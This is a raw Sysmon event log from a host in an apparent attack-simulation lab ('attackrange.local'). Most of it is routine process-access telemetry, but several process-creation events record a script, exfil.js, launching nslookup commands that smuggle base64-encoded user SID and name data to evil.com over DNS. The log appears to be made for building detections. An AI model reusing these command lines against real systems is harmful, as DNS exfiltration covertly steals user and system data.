354300x8000000000000000204596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.176{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53100- 354300x8000000000000000204595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.176{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-53100-false127.0.0.1-53domain 354300x8000000000000000204594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.176{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-53099-false127.0.0.1-53domain 354300x8000000000000000204593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.175{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53099- 354300x8000000000000000204592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.175{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-53099-false127.0.0.1-53domain 354300x8000000000000000204591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.175{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-53098-false127.0.0.1-53domain 354300x8000000000000000204590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.172{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53098- 354300x8000000000000000204589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.172{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-53098-false127.0.0.1-53domain 354300x8000000000000000204588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.082{00000000-0000-0000-0000-000000000000}3008<unknown process>-udpfalsefalse127.0.0.1-53097-false127.0.0.1-53domain 10341000x8000000000000000204587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.627{2E1864BB-17CE-629A-2542-000000005F02}76086076C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2642-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.627{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.627{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.627{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.627{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.627{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2642-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.627{2E1864BB-17CE-629A-2442-000000005F02}78403140C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-2642-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.636{2E1864BB-17CE-629A-2642-000000005F02}7084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-2442-000000005F02}7840C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvycp.tmp 2>&1 10341000x8000000000000000204579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.612{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2542-000000005F02}7608C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.612{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2542-000000005F02}7608C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.596{2E1864BB-17CE-629A-2542-000000005F02}76086076C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2442-000000005F02}7840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.596{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2542-000000005F02}7608C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.580{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2442-000000005F02}7840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.580{2E1864BB-17A1-629A-783D-000000005F02}55527456C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-2442-000000005F02}7840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.590{2E1864BB-17CE-629A-2442-000000005F02}7840C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvycp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.580{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsicr.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.527{2E1864BB-17CE-629A-2242-000000005F02}78327432C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2342-000000005F02}4348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.527{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.527{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.527{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2342-000000005F02}4348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.527{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.527{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.527{2E1864BB-17CE-629A-2142-000000005F02}72523616C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-2342-000000005F02}4348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.537{2E1864BB-17CE-629A-2342-000000005F02}4348C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-2142-000000005F02}7252C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsicr.tmp 2>&1 10341000x8000000000000000204559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 